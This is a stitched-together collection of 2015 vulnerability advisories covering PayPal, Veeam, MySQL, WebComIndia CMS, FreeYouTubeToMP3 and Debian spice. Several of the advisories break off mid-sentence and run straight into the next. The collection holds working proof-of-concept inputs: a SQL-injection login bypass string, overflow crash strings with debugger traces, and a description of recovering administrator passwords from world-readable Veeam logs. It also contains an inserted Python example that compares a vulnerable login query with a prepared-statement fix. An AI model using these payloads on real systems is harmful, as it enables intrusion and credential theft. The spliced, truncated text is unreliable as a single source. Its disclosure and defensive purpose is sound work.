PayPal Inc Bug Bounty #119 - URL Redirect Web Vulnerability
Document Title:
===============
PayPal Inc Bug Bounty #119 - URL Redirect Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1610

Release Date:
=============
2015-10-01

Vulnerability Laboratory ID (VL-ID):
====================================
1610

Common Vulnerability Scoring System:
====================================
2.4

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card).

The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received.

The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side url redirect web vulnerability in the official PayPal Inc Notify online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-28: Researcher Notification & Coordination (Rui Silva)
2015-08-09: Vendor Notification (PayPal Security Team - Bug Bounty Program)
2015-09-08: Vendor Response/Feedback (PayPal Security Team - Bug Bounty Program)
2015-09-24: Vendor Fix/Patch (PayPal Inc Developer Team)
2015-10-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: PayPal - Online Service Web Application 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
A low severity and client-side url redirect web vulnerability has been discovered in the official PayPal Inc Notify online service web-application. The vulnerability allows remote attackers to form malicious links as client-side GET method requests to manipulate a return url.

The vulnerability is located in the redirectUrl value of the main_home module. Remote attackers are able to prepare manipulated client-side application to browser requests. This results in a client-side context manipulation after the redirect itself. After some seconds the service refreshes and allows the url to be loaded by a specially crafted payload that bypasses the validation procedure.

The vulnerability can be exploited by remote attackers without privilege web-application user
Veeam Backup & Replication Local Privilege Escalation Vulnerability
Name              Sensitive Data Exposure in Veeam Backup
Systems Affected  Veeam Backup & Replication (B) v6, v6.5, v7, v8
Severity          High 7.9/10
Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
Vendor            http://www.veeam.com/
Advisory          http://www.ush.it/team/ush/hack-veeam_6_7_8/veeam.txt
Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it)
                  Francesco "ascii" Ongaro (ascii AT ush DOT it)
                  Antonio "s4tan" Parata (s4tan AT ush DOT it)
Date              20151002

I. BACKGROUND

Veeam Software provides backup, disaster recovery and virtualization management software for the VMware and Hyper-V environments. In 2012 Veeam gained more than 1200 employees worldwide, from 10 employees in 2008. It has more than 157'000 customers, 33'000 partners and 80 top industry awards and claims to be the "#1 VM Backup" solution after it gained traction against competitors like Backup Exec and Tivoli Storage Manager.

Veeam Backup & Replication is the foundation of many Veeam products, like Veeam Availability Suite and Veeam One.

ISGroup is an Italian Information Security boutique. We found this 0day issue while performing a Penetration Test for a customer; you can discover more about ISGroup by visiting http://www.isgroup.biz/.

Responsible disclosure with Veeam: Veeam has no public security@ contact and we worked with them through the ticket system, opening a case using one of our customer's assistance contracts. We were unable to escape from the sternness of this type of communication and move to PGP emails. Their response anyway was pretty prompt: we spoke first with Denis Bodnar and then escalated to Fred Bozhanov, Veeam Support Management. He managed communication with the developers.

We advise Veeam to give some of their senior developers a "security team" mandate and to expose such a team to external, direct communication. The people we spoke to did their best and were extremely kind but they must be supported by a corporate process.

Prior vulnerabilities in Veeam: It's very difficult to say if Veeam had previous vulnerabilities; there are no CVEs assigned to this vendor both on NIST and to its CPE (cpe:/:veeam).

Information to customers about the vulnerability is shown in the "other" section of the changelog: "Removed weakly encrypted username and password logging from guest processing components using networkless (VIX) guest interaction mode. Veeam thanks Pasquale Fiorillo and Francesco Ongaro of ISGroup for vulnerability discovery.".

The latest version of the software at the time of writing can be obtained from:

http://www.veeam.com/kb2068
http://forums.veeam.com/veeam-backup-replication-f2/8-0-common-issues-and-fixes-t24157.html#p130849
http://www.veeam.com/vmware-esx-backup.html

II. DESCRIPTION

The vulnerability allows a local Windows user, even with low privileges such as the ones provided to an anonymous IIS virtualhost user, to access Veeam Backup logfiles that include a double-base64 encoded version of the password used by Veeam to run.

The affected component is VeeamVixProxy, created by default on installation, and the user must be a privileged Local Administrator or a Domain Administrator.

For example, the wizard for adding a VMware or Hyper-V Backup Proxy explicitly states "Type in an account with local administrator privileges on the server you are adding. Use DOMAIN\USER format for domain accounts, or HOST\USER for local accounts.".

We conservatively refer to this issue as a Local Administrator Privilege Escalation, but the use of Domain Administrator accounts is not discouraged, if not advised, and we saw this pattern in our customer's production infrastructures.

TLDR: Anything able to read VeeamVixProxy logfiles, world readable by default, can escalate to Local or Domain Administrator.

III. ANALYSIS

Veeam Backup & Replication (B) v6, v6.5, v7, v8 store VeeamVixProxy logfiles in a directory accessible by Everyone and with permissions that make them readable by Everyone (Everyone is, in the Microsoft Windows terminology, the equivalent of the Unix's nobody user).

Such logs, which are continuously generated, contain a Local or Domain Administration user and password in an easily reversible (obfuscated) format.

In versions of Veeam prior to 8 a bug prevented log rotation [3,4]; on older systems there could be a large amount of logs and thus an extensive history of past and current Local or Domain Administrator credentials.

A) Logfiles readable by Everyone

As shown in http://www.veeam.com/kb1789 the default log path is:

Windows Server 2003: %allusersprofile%\Application Data\Veeam\Backup
Windows Server 2008 and up: %programdata%\Veeam\Backup

Our evidence is for Windows Server 2003; access to the needed files is guaranteed to the Windows group "Everyone", so any local user, even the ones used to map IIS sites, can access them. This
Advanced Information Security Corporation, Security Advisory (MYSQL v5.6.24 Buffer Overflows)
=== Advanced Information Security Corporation Security Advisory ===

~ Keeping Things Simple!

MySQL v5.6.24 BUFFER OVERFLOWS

Date: 07/10/2015
Author: Nicholas Lemonias

= SUMMARY =

During a manual source code audit of MYSQL Version 5.6.24, various buffer overflow issues have been realized.

=== TECHNICAL DETAILS ===

    root@priv8: ~# /usr/bin/mysql_plugin `perl -e 'print "A" x 9000'`
    *** buffer overflow detected ***: mysql_plugin terminated
    === Backtrace: =
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xf838a)[0xb729938a]
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877] insecure call
    mysql_plugin(main+0x202)[0xb752ee22]
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa63]
    mysql_plugin(+0xa90d)[0xb752f90d]

    Program received signal SIGABRT, Aborted.
    0xb7fdebe0 in __kernel_vsyscall ()
    (gdb) bt
    #0 0xb7fdebe0 in __kernel_vsyscall ()
    #1 0xb7caa307 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    #2 0xb7cab9c3 in __GI_abort () at abort.c:89
    #3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
    #4 0xb7d762d5 in __GI___fortify_fail (msg=msg@entry=0xb7ddbdd6 "buffer overflow detected") at fortify_fail.c:31
    #5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
    #6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' ..., src=0xbffe96ed 'A' ..., destlen=) at strcpy_chk.c:60
    #7 0x80009e22 in main ()
    (gdb)
    (gdb) disas
    Dump of assembler code for function __kernel_vsyscall:
       0xb7fdebd0 <+0>: push %ecx
       0xb7fdebd1 <+1>: push %edx
       0xb7fdebd2 <+2>: push %ebp
       0xb7fdebd3 <+3>: mov %esp,%ebp
       0xb7fdebd5 <+5>: sysenter
       0xb7fdebd7 <+7>: nop
       0xb7fdebd8 <+8>: nop
       0xb7fdebd9 <+9>: nop
       0xb7fdebda <+10>: nop
       0xb7fdebdb <+11>: nop
       0xb7fdebdc <+12>: nop
       0xb7fdebdd <+13>: nop
       0xb7fdebde <+14>: int x80
    => 0xb7fdebe0 <+16>: pop %ebp
       0xb7fdebe1 <+17>: pop %edx
       0xb7fdebe2 <+18>: pop %ecx
       0xb7fdebe3 <+19>: ret
    End of assembler dump.
    (gdb)

TECHNICAL SYNOPSIS / POC

#2 Unsafe Use of strcpy; this can lead to a buffer overflow condition
-> /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]

A user-supplied string from the command-line is copied to a fixed length destination buffer.

-[ mysql_plugin.c]---
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c

    strcpy(plugin_name, argv[i]);

permission set:

    -rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin

=== MySQL V 5.6.24 VULNERABILITIES - SOURCE CODE ===

1. Insecure use of sprintf

Vulnerability Description: A char* type is copied to a fixed length destination buffer. This could lead to a buffer overflow.

Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c

    sprintf(efbuf, "MY_REG_%s", name);

2. Unsafe Use of strcpy could lead to an overflow condition.

Vulnerability Description: A user-supplied string from the command-line is copied to a fixed length destination buffer. This could lead to a buffer overflow.

Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c

    strcpy(plugin_name, argv[i]);

3. Unsafe Use of strcpy could lead to an overflow condition.

Vulnerability Description: A user-supplied string from the command-line is copied to a fixed length destination buffer. This
WebComIndia CMS 2015Q4 - Auth Bypass Vulnerability
Document Title:
===============
WebComIndia CMS 2015Q4 - Auth Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1614

Release Date:
=============
2015-10-07

Vulnerability Laboratory ID (VL-ID):
====================================
1614

Common Vulnerability Scoring System:
====================================
8.3

Product & Service Introduction:
===============================
Where quality & reliability converge. Web.Com (India) is an ISO 9001:2008 certified Software company specialising in custom software development, web design and development, mobile app development, SEO and SMO Services in Guwahati, Assam. Deploying the latest technologies, we deliver solutions that offer high levels of consistency in quality and performance. Our technological intelligence spans several platforms, languages and databases. As a leading IT solutions provider, our technical skill set is ever up-to-date, comprising of the latest and the quintessential.

(Copy of the Vendor Homepage: http://www.webcomindia.biz/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an auth bypass vulnerability in the official WebComIndia Content Management System (web-application).

Vulnerability Disclosure Timeline:
==================================
2015-10-07: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
WebComIndia Ltd
Product: WebComIndia.Biz - Content Management System 2015 Q4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An auth bypass web vulnerability has been discovered in the official WebComIndia Content Management System 2015Q4. The vulnerability allows remote attackers to bypass the login mechanism of the web-application to compromise the service.

The auth bypass web vulnerability has been discovered in the Username input field of the login module. Remote attackers are able to bypass the mechanism to log in to the web-application without authorization. The vulnerability is located in the code-line on the application-side of the online-service. The request method to inject/execute is POST and the injection point is the Username. The vulnerability is a classic login auth bypass that ultimately allows compromise of the dbms and web-application.

The security risk of the auth bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3. Exploitation of the login form auth bypass web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the vulnerability results in unauthorized access to the admin panel, defacement, web-application and dbms compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Login

Affected Module(s):
[+] Account System - (Admin Panel)

Vulnerable Parameter(s):
[+] Username

Proof of Concept (PoC):
=======================
The auth bypass vulnerability can be exploited by remote attackers without privilege application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the vulnerable website
2. Surf to the admin panel
3. Inject to the Username input the following content `admin'-- -`
4. Include any random value as Password input and save the form to continue
5. Click on Login and you will be able to bypass login
   Note: The Username input field and request is not sanitized properly
6. Successful reproduce of the remote auth bypass vulnerability!

Website: http://[server].com/
Admin Panel: http://[server].com/admin

PoC: (Input)
Username: admin'-- -
Password: purani
> Login Bypass successful!

Note: The password value can be chosen randomly by the attacker!

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode or escape of the Username value input. Restrict the input and disallow special chars. Include an exception handler and prevent the injection by using a prepared statement.

Security Risk:
==============
The security risk of the auth bypass vulnerability in the Username input field and login request is estimated as high. (CVSS 8.3)

Credits & Authors:
==================
Aaditya Purani - ( http://aadityapurani.com ) [ http://www.vulnerability-lab.com/show.php?user=Aaditya%20Purani ]

Special Thanks: Hell Shield Hackers | Ahmedabad University | Skysecura

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab
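
The prepared-statement fix named in the WebComIndia advisory's "Solution - Fix & Patch" section, shown beside the concatenated login query that the PoC Username value defeats. This is an added example, not code from the advisory or from the WebComIndia CMS; the SQLite schema, the account, the function names and the hashing scheme are assumptions.

```python
import hashlib
import hmac
import sqlite3

# Fixed salt keeps the demo short (assumption); use a per-user salt in practice.
DEMO_SALT = b"constructed-demo-salt"


def pw_digest(password):
    """Derive the stored password digest (PBKDF2-HMAC-SHA256, hex)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 10_000).hex()


def make_db():
    """In-memory database with one constructed admin account (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_digest TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", pw_digest("S3cure-constructed-pw")))
    return db


def login_vulnerable(db, username, password):
    """'Before' pattern: form input is concatenated into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_digest = '" + pw_digest(password) + "'")
    # With the Username value  admin'-- -  the statement becomes
    #   ... WHERE username = 'admin'-- -' AND pw_digest = '...'
    # Everything after -- is a SQL comment, so the password is never checked.
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username, password):
    """'After' pattern: bound parameter plus constant-time digest comparison."""
    row = db.execute("SELECT pw_digest FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        # Unknown user: still derive a digest so timing does not reveal
        # whether the account exists.
        pw_digest(password)
        return False
    return hmac.compare_digest(row[0], pw_digest(password))


def demo():
    """Run the advisory's PoC input against both login functions."""
    db = make_db()
    payload = "admin'-- -"  # Username value from the advisory's PoC
    return {
        "vulnerable_payload": login_vulnerable(db, payload, "purani"),
        "hardened_payload": login_hardened(db, payload, "purani"),
        "hardened_valid": login_hardened(db, "admin", "S3cure-constructed-pw"),
        "hardened_wrong_pw": login_hardened(db, "admin", "purani"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the bound parameter the whole Username value, quote and comment marker included, is compared as data against the `username` column, so no row matches and the login fails.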
FreeYouTubeToMP3 Converter 4.0.1 - Buffer Overflow Vulnerability
Document Title:
===============
FreeYouTubeToMP3 Converter 4.0.1 - Buffer Overflow Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1613

Release Date:
=============
2015-10-06

Vulnerability Laboratory ID (VL-ID):
====================================
1613

Common Vulnerability Scoring System:
====================================
7.2

Product & Service Introduction:
===============================
Free YouTube to MP3 Converter is the world's best software that lets you convert YouTube videos to MP3 and lossless. 300 Million people have enjoyed our software so far! It is the best choice to convert playlists and user channels to MP3. Download the music you love. Download your favorite artists music for a playback. Convert to MP3 keeping the best possible quality (up to 320 kbps). Music in bulk. Find playlists and YouTube channels to match your mood. Download and convert in a moment. Pure sound. Convert to lossless. Formats available: WAV, FLAC, ALAC. Perfect match. Convert YouTube to any device possible. Output formats: MP3, M4A, AAC, WMA, OGG.

DVDVideoSoft's products are freeware. In order to maintain product development and provide you with high-quality software, DVDVideoSoft may bundle links to other websites and third-party apps installations including toolbars in its products. Every time DVDVideoSoft products are installed, you have an obvious option to accept or opt-out of such installations.

(Copy of the Vendor Homepage: https://www.dvdvideosoft.com )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official Free Youtube To MP3 Converter v4.0.1 software.

Vulnerability Disclosure Timeline:
==================================
2015-10-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
DVDVideoSoft Ltd.
Product: Free YouTube to MP3 Converter - Software (Windows) 4.0.1.1001

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A classic buffer overflow vulnerability has been discovered in the official Free Youtube To MP3 Converter v4.0.1 software. The local vulnerability allows an attacker to overwrite the registers of the software process to compromise the target computer system.

The vulnerability is located in the `Go Menu > Tools > Options > Key Activation` module. Local attackers are able to include a malicious unicode payload as the `key` value (input) to crash the software via buffer overflow. Local attackers are able to take over the system process by escalating privileges in the local target computer system. The windows version of the software is affected by the vulnerability. The vulnerable input is located in the activation key module.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
[+] Go Menu > Tools > Options > Key Activation

Vulnerable Input(s):
[+] Activation Key

Affected Module(s):
[+] Activate

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local attackers with restricted account or system access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Execute Free-YouTube-To-MP3-Converter.exe
2. Copy the ...string from bof.txt to clipboard
3. Go Menu -> Tools -> Options
4. Paste it into the Activation Key input and click Activate
5. Software will Crash
6. Successful reproduce of the local buffer overflow vulnerability!

--- Debug Session Logs [WINDGB] ---
Access violation - code c005 (!!! second chance !!!)
eax=00316a30 ebx=41414141 ecx=41414141 edx= esi=00316a30 edi=
eip=779071b4 esp=003169cc ebp=00316a1c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0202
ntdll!KiFastSystemCallRet:
779071b4 c3 ret

0:000> !exchain
00319484: 41414141
Invalid exception stack at 41414141

0:000> d 00319484
00319484 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
00319494 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
003194a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
003194b4 41 41 41 41 41 41 41 41-41 41 41
[SECURITY] [DSA 3371-1] spice security update
Debian Security Advisory DSA-3371-1          secur...@debian.org
https://www.debian.org/security/             Salvatore Bonaccorso
October 09, 2015                             https://www.debian.org/security/faq

Package     : spice
CVE ID      : CVE-2015-5260 CVE-2015-5261
Debian Bug  : 801089 801091

Frediano Ziglio of Red Hat discovered several vulnerabilities in spice, a SPICE protocol client and server library. A malicious guest can exploit these flaws to cause a denial of service (QEMU process crash), execute arbitrary code on the host with the privileges of the hosting QEMU process or read and write arbitrary memory locations on the host.

For the oldstable distribution (wheezy), these problems have been fixed in version 0.11.0-1+deb7u2.

For the stable distribution (jessie), these problems have been fixed in version 0.12.5-1+deb8u2.

For the unstable distribution (sid), these problems have been fixed in version 0.12.5-1.3.

We recommend that you upgrade your spice packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org